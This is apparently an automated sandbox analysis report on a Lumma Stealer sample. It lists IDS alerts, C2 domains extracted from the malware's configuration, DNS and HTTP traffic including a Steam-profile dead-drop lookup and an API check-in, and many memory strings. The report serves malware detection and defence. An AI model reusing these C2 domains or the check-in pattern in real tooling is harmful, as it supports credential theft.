      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]0_2_00738FA0

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.9:62547 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.9:57145 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.9:62535 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.9:63913 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.9:55219 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.9:54275 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.9:57293 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.9:49807 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.9:63618 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.9:49722 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49733 -> 172.67.157.254:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49733 -> 172.67.157.254:443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: energyaffai.lat
      Source: Malware configuration extractorURLs: grannyejh.lat
      Source: Malware configuration extractorURLs: aspecteirs.lat
      Source: Malware configuration extractorURLs: discokeyus.lat
      Source: Malware configuration extractorURLs: necklacebudi.lat
      Source: Malware configuration extractorURLs: rapeflowwj.lat
      Source: Malware configuration extractorURLs: sweepyribs.lat
      Source: Malware configuration extractorURLs: sustainskelet.lat
      Source: Malware configuration extractorURLs: crosshuaht.lat
      Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
      Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49722 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49733 -> 172.67.157.254:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49739 -> 172.67.157.254:443
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: heckout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com " equals www.youtube.com (Youtube)
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
      Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
      Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
      Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
      Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
      Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
      Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
      Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
      Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
      Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.c
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fast
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.s
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamst
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamsta
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/publ2
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&lB
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skinR
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716705757.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuex
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptac2
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.c
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
